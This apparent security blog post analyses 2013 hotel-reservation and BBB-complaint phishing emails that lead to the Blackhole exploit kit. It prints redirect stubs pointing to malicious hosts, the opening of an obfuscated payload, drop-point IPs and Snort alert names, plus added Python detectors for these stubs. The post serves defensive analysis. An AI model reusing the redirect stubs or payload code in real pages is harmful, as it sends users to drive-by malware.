Fort Knox Networks<br />
<br />
Hotel Registration Phishing Campaign with AutoClerk(?)<br />
Posted 2013-06-19<br />
<br />
This particular campaign uses the "shock and awe" billing technique to create urgency, along with predictable Blackhole techniques.<br />
<span style="font-size: x-small;">Also spotted on <a href="http://www.dslreports.com/forum/r28395834-personalityhotels.com-spam-points-to-compromised-site">DSL Reports</a></span><br />
<br />
<br />
Subject: <span class="Apple-tab-span" style="white-space: pre;"> </span>Your reservation at HOTEL UNION SQUARE<br />
From: <span class="Apple-tab-span" style="white-space: pre;"> </span>"Reservations" &lt;reservations@m.personalityhotelsmail.net&gt;<br />
Date: <span class="Apple-tab-span" style="white-space: pre;"> </span>Wed, June 19, 2013 12:39 pm<br />
Priority: <span class="Apple-tab-span" style="white-space: pre;"> </span>Normal<br />
<br />
Header information:<br />
<span style="color: red;">X-Mailer: AutoClerk</span> <b><--- Whoa. Stop.</b><br />
<b>Let's dive</b><br />
<a href="http://www.autoclerk.com/news/autoclerk-introduces-emarketing-to-its-suite-of-products-and-services">http://www.autoclerk.com/news/autoclerk-introduces-emarketing-to-its-suite-of-products-and-services</a><br />
AutoClerk is a property management system that provides eMarketing to hotels.<br />
<a href="http://www.autoclerk.com/hotel-emarketing">http://www.autoclerk.com/hotel-emarketing</a><br />
<h2 style="text-align: center;">
<span style="font-size: x-large;">^^</span></h2>
Content-Type: multipart/alternative; <b><-- Plain text and html elements k.</b><br />
X-Spam-Status: No, score=5.8 <--- <b>Not close enough.</b><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2Q_uj7OjaFP_unFg3ZeHYo7dqQ2oefOddQPzq1pHodY2k2xXy0GNGfOMkQoAo4GHVHF6L5YPQCL1GQrXR-n1EBfUJWz1tdGYJNYRSoDKi234dTe4ZRT1bRwEnTgqnyVqKC9jH8Zxcs0w/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2Q_uj7OjaFP_unFg3ZeHYo7dqQ2oefOddQPzq1pHodY2k2xXy0GNGfOMkQoAo4GHVHF6L5YPQCL1GQrXR-n1EBfUJWz1tdGYJNYRSoDKi234dTe4ZRT1bRwEnTgqnyVqKC9jH8Zxcs0w/s400/Capture.PNG" width="376" /></a></div>
<br />
Sent to you from Copenhagen, because clearly that's where Hotel Union Square is... not.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGs3cZZoxjAualZWBqHuSce2k-vb_fPKk-aJ3atZp5iCDyDNUeKkMz7lgx4eDI8dtDmw3DjdYra_6x5hkrDOCj3IcL05rzMlRFDbe4y_2vuVQwCFYcrQH0QJRO5L5B_XVCbeHKkYxmgNQ/s1600/copenhagen.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGs3cZZoxjAualZWBqHuSce2k-vb_fPKk-aJ3atZp5iCDyDNUeKkMz7lgx4eDI8dtDmw3DjdYra_6x5hkrDOCj3IcL05rzMlRFDbe4y_2vuVQwCFYcrQH0QJRO5L5B_XVCbeHKkYxmgNQ/s1600/copenhagen.PNG" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The payload uses a refresh method to immediately redirect you. Nothing new but we can still use this for more information.</div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">(html>(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">(title>HOTEL·UNION·SQUARE·is·loading...(/title>(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">(script·type="text/javascript">(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">(!--(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;"><b>location.replace("http://winne2000.net/news/enough-advise.php</b>");(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">//-->(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">(/script>(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;"><b>(noscript>(</b>CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;"><b>(meta·http-equiv="refresh"·content="0;·url=http://winne2000.net/news/enough-advise.php</b>">(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">(/noscript>(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">(/head>(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">(h1>You·will·be·redirected·to·process(/h1>(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">(h4·style="color:#364dbc;">We·must·complete·few·security·checks·to·show·your·transfer·details:(/h4>(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">(h3>Be·sure·you·have·a·transfer·reference·ID.(br·/>You·will·be·asked·to·enter·it·after·we·check·the·link.(br>(br>Important:·Please·be·advised·that·calls·to·and·from·your·wire·service·team·may·be·monitored·or·recorded.(br·/>(/h3>(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: monospace;">(CR)(LF)</span></div>
<div class="separator" style="clear: both;">
<span style="color: red; font-family: monospace;">(h3><b>Redirecting·to·Complain·details...·Please·wait...</b>(/h3>(CR)(LF)</span></div>
<div>
<br /></div>
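<div>
A defender can pull both redirect mechanisms out of a stub like this and check whether they agree on one off-site URL. The following is an added example, not code from the original post; the host names and the two sample pages are constructed, and the function and reason names are assumptions made for illustration.</div>

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# location.replace("..."), location.assign("...") and location[.href] = "..."
JS_REDIRECT = re.compile(
    r"""location\s*(?:\.href)?\s*(?:\.(?:replace|assign)\s*\(|=)\s*["']([^"']+)["']""",
    re.IGNORECASE,
)
# content="0; url=http://..." -> (delay, url)
META_REFRESH = re.compile(
    r"""^\s*(\d+)\s*[;,]\s*url\s*=\s*["']?(.*?)["']?\s*$""", re.IGNORECASE
)


class _StubParser(HTMLParser):
    """Collects script text and meta-refresh tags, noting <noscript> context."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.in_script = False
        self.noscript_depth = 0
        self.script_text = []
        self.meta_targets = []  # (delay_seconds, url, inside_noscript)

    def handle_starttag(self, tag, attrs):
        attr = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self.in_script = True
        elif tag == "noscript":
            self.noscript_depth += 1
        elif tag == "meta" and attr.get("http-equiv", "").lower() == "refresh":
            m = META_REFRESH.match(attr.get("content", ""))
            if m:
                self.meta_targets.append(
                    (int(m.group(1)), m.group(2), self.noscript_depth > 0))

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False
        elif tag == "noscript" and self.noscript_depth:
            self.noscript_depth -= 1

    def handle_data(self, data):
        if self.in_script:
            self.script_text.append(data)


def analyze_stub(html, served_from):
    """Return the redirect targets in `html` and the reasons it looks like a stub."""
    parser = _StubParser()
    parser.feed(html)
    parser.close()
    js_targets = JS_REDIRECT.findall("".join(parser.script_text))

    def offsite(url):
        host = urlparse(url).hostname  # None for relative URLs
        return host is not None and host.lower() != served_from.lower()

    zero_delay = [(url, ns) for delay, url, ns in parser.meta_targets if delay == 0]
    reasons = []
    if any(offsite(u) for u in js_targets):
        reasons.append("script-redirect-offsite")
    if any(offsite(u) for u, _ in zero_delay):
        reasons.append("zero-delay-meta-refresh-offsite")
    if any(ns and u in js_targets for u, ns in zero_delay):
        reasons.append("noscript-fallback-same-target")
    return {
        "js_targets": js_targets,
        "meta_targets": parser.meta_targets,
        "reasons": reasons,
        # Script and noscript paths agreeing on one off-site URL marks the stub.
        "suspicious": len(reasons) == 3,
    }


# Constructed sample modelled on the stub shown above (placeholder host).
SAMPLE_STUB = """<html>
<title>HOTEL UNION SQUARE is loading...</title>
<script type="text/javascript">
<!--
location.replace("http://redirector.example/news/landing.php");
//-->
</script>
<noscript>
<meta http-equiv="refresh" content="0; url=http://redirector.example/news/landing.php">
</noscript>
</head>
<h1>You will be redirected to process</h1>
"""

# Constructed benign page: slow same-site refresh, script only reads location.
BENIGN_PAGE = """<html><head>
<meta http-equiv="refresh" content="300; url=/status">
<script>var here = window.location.pathname;</script>
</head><body>Status board</body></html>
"""

if __name__ == "__main__":
    print(analyze_stub(SAMPLE_STUB, "compromised-site.example"))
    print(analyze_stub(BENIGN_PAGE, "intranet.example"))
```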
<div>
And the payload begins with:</div>
<div>
<br /></div>
<div>
<span style="color: red;">&lt;style&gt;b,div{color:#fff;}&lt;/style&gt;&lt;script&gt;function vq(){s="";zzz();az=21;try{<b>caewbtew</b>=~312;}catch(vava){az=0;}</span></div>
<div>
<br /></div>
<h3>
Let's go deeper</h3>
<div>
<br /></div>
<div>
The <b>caewbtew=~</b> string at the entry point is consistent with the FedEx, <a href="https://groups.google.com/forum/?fromgroups#!searchin/alt.comp.virus/caewbtew/alt.comp.virus/Xlp886uCKDU/ptGWLsd_7pEJ">American Airlines</a>, DHL, and <a href="http://techhelplist.com/index.php/spam-list/150-receipt-for-your-paypal-payment-to-x-fake-paypal-phishing-scam">PayPal</a> campaigns, with some obfuscation techniques that follow. Oh yes, also the BBB Campaign I looked at <a href="http://fortknoxnetworks.blogspot.com/2013/06/bbb-phish-event-blackhole-zeroaccess.html">here</a>. There are two observed variants, one with catch(vava) and one with catch(qw). This is some lovely stuff when coupled with some other indicators and I've used it very successfully in the past.</div>
<div>
<br /></div>
<div>
This string has also been spotted on other compromised WordPress sites, about 860 indexed in Google.</div>
<div>
<br /></div>
<div>
April <a href="http://jsunpack.jeek.org/?report=1389949d2b3b67f33871cbe7c001b8fb3caafe11">http://jsunpack.jeek.org/?report=1389949d2b3b67f33871cbe7c001b8fb3caafe11</a></div>
<div>
April <a href="https://gist.github.com/evilscheme/d10ea4130d5362618653/raw/d87777b84ab172a6d17ef3211539d336b53401b6/gistfile1.txt">https://gist.github.com/evilscheme/d10ea4130d5362618653/raw/d87777b84ab172a6d17ef3211539d336b53401b6/gistfile1.txt</a></div>
<div>
May <a href="http://jsunpack.jeek.org/dec/go?report=18cb65b3b38a735293e483cd4ef6588bce6cd7ec">http://jsunpack.jeek.org/dec/go?report=18cb65b3b38a735293e483cd4ef6588bce6cd7ec</a></div>
<div>
June <a href="http://jsunpack.jeek.org/dec/go?report=8bd4f7ec9acaa2e252a5964cf4069e5c37048fb0">http://jsunpack.jeek.org/dec/go?report=8bd4f7ec9acaa2e252a5964cf4069e5c37048fb0</a></div>
<div>
<br /></div>
<div>
Which also contained the string:</div>
<div>
<b><span style="color: red;">Redirecting to Complain details... Please wait...</span></b></div>
<div>
<b><span style="color: red;"><br /></span></b></div>
<div>
Something like 860 hits. Same as the BBB Campaign</div>
<div>
<br /></div>
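<div>
One way to use these strings together when triaging captured response bodies, so that a page merely mentioning the token (such as a forum thread) ranks below a page carrying the full entry-point idiom. This is an added example, not code from the original post; the URLs and bodies are constructed, and the indicator names and confidence levels are assumptions made for illustration.</div>

```python
import re

# Entry-point idiom quoted in the post: try{caewbtew=~312;}catch(vava){...}
# Whitespace and the integer literal are allowed to vary.
ENTRY_POINT = re.compile(
    r"try\s*\{\s*caewbtew\s*=\s*~\s*\d+\s*;?\s*\}\s*"
    r"catch\s*\(\s*(?P<var>[A-Za-z_$][\w$]*)\s*\)"
)
KNOWN_CATCH_VARS = ("vava", "qw")  # the two variants the post reports
# Style prelude that precedes the script in the quoted payload.
HIDDEN_TEXT_STYLE = re.compile(
    r"<style>\s*b\s*,\s*div\s*\{\s*color\s*:\s*#fff\s*;?\s*\}", re.IGNORECASE
)
# Phrase shared by the hotel and BBB redirect stubs.
STUB_PHRASE = re.compile(r"Redirecting\s+to\s+Complain\s+details\.\.\.", re.IGNORECASE)

_RANK = {"high": 0, "medium": 1, "low": 2}


def fingerprint(body):
    """Return (page_type, variant, confidence, indicators) for one response body."""
    indicators, variant, page_type = [], None, None
    m = ENTRY_POINT.search(body)
    if m:
        page_type = "landing"
        variant = m.group("var") if m.group("var") in KNOWN_CATCH_VARS else "unknown"
        indicators.append("entry-point")
    elif "caewbtew" in body:
        # Token without the try/catch idiom: likely a write-up, not a payload.
        indicators.append("token-only")
    if HIDDEN_TEXT_STYLE.search(body):
        indicators.append("hidden-text-style")
    if STUB_PHRASE.search(body):
        page_type = page_type or "redirect-stub"
        indicators.append("stub-phrase")

    if not indicators:
        confidence = "none"
    elif page_type is None:
        confidence = "low"
    elif len(indicators) >= 2:
        confidence = "high"
    else:
        confidence = "medium"
    return page_type, variant, confidence, indicators


def triage(records):
    """records: iterable of (url, body). Returns matching rows, strongest first."""
    rows = []
    for url, body in records:
        page_type, variant, confidence, indicators = fingerprint(body)
        if indicators:
            rows.append({"url": url, "page_type": page_type, "variant": variant,
                         "confidence": confidence, "indicators": indicators})
    return sorted(rows, key=lambda r: _RANK[r["confidence"]])


# Constructed response bodies (placeholder hosts).
SAMPLES = [
    ("http://forum.example/thread/1",
     "Has anyone seen the caewbtew variable in injected scripts?"),
    ("http://host-b.example/x.php",
     "<script>function f(){try { caewbtew = ~77; } catch (qw) {n=0;}"),
    ("http://host-a.example/news/a.php",
     '<style>b,div{color:#fff;}</style><script>function vq(){s="";zzz();'
     "az=21;try{caewbtew=~312;}catch(vava){az=0;}"),
    ("http://host-c.example/bbb.html",
     "<h3>Redirecting to Complain details... Please wait...</h3>"),
    ("http://clean.example/", "<html><body>hello</body></html>"),
]

if __name__ == "__main__":
    for row in triage(SAMPLES):
        print(row)
```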
<div>
Proving once again that nothing beats a human security analyst:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaBaEr2WUEBlqu-GsALqjsk9EnGUPqXTmvX81rK7ItwwphcCS63sCwem0t3hTUMrVsTwLL56uOp5FcNgeXRQA3jj2QvDh7JPOId4H9BdXxRFvtFiseV_kUf4i4f9Ma6Tvm52S2LYGQ2HE/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaBaEr2WUEBlqu-GsALqjsk9EnGUPqXTmvX81rK7ItwwphcCS63sCwem0t3hTUMrVsTwLL56uOp5FcNgeXRQA3jj2QvDh7JPOId4H9BdXxRFvtFiseV_kUf4i4f9Ma6Tvm52S2LYGQ2HE/s400/Capture.PNG" width="400" /></a></div>
<div>
<br /></div>
<div>
I'm not going to rehash blackhole here. We know what's up. Evidence of a broader campaign below.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTqfS2k3bmHRbbnV9AhrQBflj3vyKrm5i6j7olnJAv82ZCS2LIkZCbGYSjnjelmAYhhoaLuEKKGyC_8m8kDHqMos13ATwW4Tgvwt5fa_3N5vkzTOYOFjjcSWAn0bLKrZyivxhw0hyphenhyphenr4tY/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="80" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTqfS2k3bmHRbbnV9AhrQBflj3vyKrm5i6j7olnJAv82ZCS2LIkZCbGYSjnjelmAYhhoaLuEKKGyC_8m8kDHqMos13ATwW4Tgvwt5fa_3N5vkzTOYOFjjcSWAn0bLKrZyivxhw0hyphenhyphenr4tY/s400/Capture.PNG" width="400" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
References:</div>
<div>
<a href="http://techhelplist.com/index.php/spam-list/150-receipt-for-your-paypal-payment-to-x-fake-paypal-phishing-scam">http://techhelplist.com/index.php/spam-list/150-receipt-for-your-paypal-payment-to-x-fake-paypal-phishing-scam</a></div>
<div>
<a href="https://groups.google.com/forum/?fromgroups#!searchin/alt.comp.virus/caewbtew/alt.comp.virus/Xlp886uCKDU/ptGWLsd_7pEJ">https://groups.google.com/forum/?fromgroups#!searchin/alt.comp.virus/caewbtew/alt.comp.virus/Xlp886uCKDU/ptGWLsd_7pEJ</a> (Oddly enough about a Windows 98 system hit with exploit)</div>
<div>
<a href="http://pastebin.com/vBVJUb9w">http://pastebin.com/vBVJUb9w</a></div>
<div>
<br /></div>
BBB Phish Event - Blackhole - ZeroAccess<br />
Posted 2013-06-07<br />
<div style="padding: 10px 0px 0px;">
<h3>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhP5x-vL5hFyrg4LtHb7AzAGdlCgAasP37vdXBiFKi5TkWVaHsAkLvPWpMgLxtFcH1zuupwakamyfBjxL1Pi-EyXXA7pDz678wiiv3Zk3HsaOrHWCCRuoPcVI7_slCx4dI-UZqt94bGqYk/s1600/blackhole+6-7-20133+-2.png" imageanchor="1" style="clear: left; font-size: medium; font-weight: normal; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhP5x-vL5hFyrg4LtHb7AzAGdlCgAasP37vdXBiFKi5TkWVaHsAkLvPWpMgLxtFcH1zuupwakamyfBjxL1Pi-EyXXA7pDz678wiiv3Zk3HsaOrHWCCRuoPcVI7_slCx4dI-UZqt94bGqYk/s1600/blackhole+6-7-20133+-2.png" /></a></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">EMAIL</span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif; font-size: 14px;">The Better Business Bureau has been filed the above mentioned reclamation from one of your clients in respect of their dealings with you. The detailed description of the consumer's anxiety are available by clicking the link below. Please give attention to this issue and notify us about your mind as soon as possible.</span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">We politely ask you to overview the &lt;LINK&gt;GRIEVANCE REPORT&lt;LINK&gt; to meet on this complaint.</span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">We are looking forward to your prompt response.</span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">Best regards</span></span><br />
<span style="font-family: Arial, sans-serif; font-size: 14px;">Tristan Lewis</span><br />
<span style="font-family: Arial, sans-serif; font-size: 14px;">Dispute Councilor</span><br />
<span style="font-family: Arial, sans-serif; font-size: 14px;">Better Business Bureau</span></h3>
<h3>
<span style="font-family: Arial, sans-serif; font-size: 14px;">==============HTML====================</span></h3>
<h3>
<span style="font-family: Arial, sans-serif; font-size: 14px;">GET /bbb.html HTTP/1.1</span><br />
<span style="font-family: Arial, sans-serif; font-size: 14px;">Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*</span><br />
<span style="font-family: Arial, sans-serif; font-size: 14px;">Accept-Language: en-us</span><br />
<span style="font-family: Arial, sans-serif; font-size: 14px;">User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)</span><br />
<span style="font-family: Arial, sans-serif; font-size: 14px;">Accept-Encoding: </span><br />
<span style="font-family: Arial, sans-serif; font-size: 14px;">Host: speedgarage.com.ua</span><br />
<span style="font-family: Arial, sans-serif; font-size: 14px;">Connection: Keep-Alive</span></h3>
<h3>
<span style="font-family: Arial, sans-serif; font-size: 14px;">HTTP/1.0 200 OK</span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">Server: nginx/1.1.10</span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">Date: Fri, 07 Jun 2013 17:13:03 GMT</span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">Content-Type: text/html</span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">Content-Length: 738</span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">Last-Modified: Fri, 07 Jun 2013 11:53:09 GMT</span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">Accept-Ranges: bytes</span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;"><br /></span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">Connection: keep-alive</span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;"><br /></span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">(html></span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">(title>BBB is loading...(/title></span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">(script type="text/javascript"></span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">(!--location.replace("http://pnpnews.net/news/readers-sections.php");</span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">//--></span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;"><br /></span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">(/script></span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;"><br /></span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">(noscript></span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">(meta http-equiv="refresh" content="0; url=http://pnpnews.net/news/readers-sections.php"></span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">(/noscript></span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">(/head></span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">(h1>You will be redirected to process(/h1></span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">(h3>Redirecting to Complain details... Please wait...(/h3></span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">location.replace("http://pnpnews.net/news/readers-sections.php");</span></span></h3>
<h3>
<span style="font-family: Arial, sans-serif;"><span style="font-size: 14px;">"refresh" content="0; url=http://pnpnews.net/news/readers-sections.php</span></span></h3>
<div style="font-family: Arial, sans-serif; font-size: 12px;">
<br /></div>
</div>
<div style="padding: 0px;">
<div style="font-family: 'Lucida Sans', sans-serif, arial, sans-serif; font-size: 11px;">
<span style="background-color: white;"><br /></span></div>
<div class="separator" style="clear: both; font-family: 'Lucida Sans', sans-serif, arial, sans-serif; font-size: 11px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibmkc_ZLdbjV7s0dFhaBwclLgRbolDnNajP1Rz4ci5Xel4i4UTxxdfjaYf7uFIV_jN6TzqjKy1joOg82thwBfNP3lBUon4x_PEd8bmQCWeIYEj5aR_p5K7HGm8H1SVENPPRacR2pXD3oI/s1600/blackhole+6-7-20133.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="background-color: white; color: black;"><img border="0" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibmkc_ZLdbjV7s0dFhaBwclLgRbolDnNajP1Rz4ci5Xel4i4UTxxdfjaYf7uFIV_jN6TzqjKy1joOg82thwBfNP3lBUon4x_PEd8bmQCWeIYEj5aR_p5K7HGm8H1SVENPPRacR2pXD3oI/s640/blackhole+6-7-20133.png" width="640" /></span></a></div>
<div style="font-family: 'Lucida Sans', sans-serif, arial, sans-serif; font-size: 11px;">
<span style="background-color: white;"><br /></span></div>
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: large;">Payload: pnpnews.net</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;"><span style="font-size: 11px;"><br /></span></span>
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: large;">Exploit Kit: Blackhole</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;"><span style="font-size: 11px;"><br /></span></span>
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: large;">Snort Rules </span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;"><span style="font-size: 11px;"><br /></span></span>
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: x-small;">ET TROJAN Spoofed MSIE 7 User-Agent Likely Ponmocup</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: x-small;">ET CURRENT_EVENTS SUSPICIOUS JAR Download by Java UA with non JAR EXT matches various EKs</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: x-small;">ET INFO Packed Executable Download</span><br />
<span style="font-family: 'Lucida Sans', sans-serif, arial, sans-serif; font-size: x-small;">ET CURRENT_EVENTS Blackhole request for Payload</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: x-small;">ET CURRENT_EVENTS BlackHole EK JNLP request</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: x-small;">ET CURRENT_EVENTS - Possible BlackHole request with decryption Base</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: x-small;">ET TROJAN Pony Downloader check-in response STATUS-IMPORT-OK</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: x-small;">ET TROJAN Known Trojan Downloader HTTP Library MSIE 5 Win98 seen with ZeuS</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: x-small;">ET TROJAN Fareit/Pony Downloader Checkin 2</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: x-small;">ET CURRENT_EVENTS DRIVEBY Blackhole - Payload Download - readme.exe</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: x-small;">ET CURRENT_EVENTS DRIVEBY Blackhole - Payload Download - contacts.exe</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: x-small;">ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (6)</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: x-small;">ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (5)</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: x-small;">ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (41)</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: x-small;">ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (33)</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: x-small;">ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (13)</span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;"><br /></span>
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: large;">Drop Points: </span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;">88.191.130.98:8080</span><br />
<br />
<ul>
<li><span style="font-family: 'Lucida Sans', sans-serif, arial, sans-serif;">8080/tcp open http nginx 1.0.10</span></li>
<li><span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;">21/tcp open ftp Pure-FTPd</span></li>
<li><span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;">22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu7 (protocol 2.0)</span></li>
<li><span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;">25/tcp open smtp Postfix smtpd</span></li>
<li><span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;">80/tcp open http Apache httpd 2.2.14 ((Ubuntu))</span></li>
<li><span style="font-family: 'Lucida Sans', sans-serif, arial, sans-serif;">8080/tcp open http nginx 1.0.10</span></li>
<li><span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;">8090/tcp open http nginx 1.2.6</span></li>
</ul>
<br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;">213.214.74.5:8080 </span><br />
<br />
<ul>
<li><span style="font-family: 'Lucida Sans', sans-serif, arial, sans-serif;">8080/tcp open http nginx 1.0.10</span></li>
<li><span style="font-family: 'Lucida Sans', sans-serif, arial, sans-serif;">21/tcp open ftp ProFTPD 1.3.3d</span></li>
<li><span style="font-family: 'Lucida Sans', sans-serif, arial, sans-serif;">22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (protocol 2.0)</span></li>
<li><span style="font-family: 'Lucida Sans', sans-serif, arial, sans-serif;">80/tcp open http Apache httpd 2.2.17 ((Ubuntu))</span></li>
</ul>
<br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;"><br /></span>
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif; font-size: large;">Disk Artifacts of Interest: </span><br />
<span style="font-family: Lucida Sans, sans-serif, arial, sans-serif;"><br /></span>
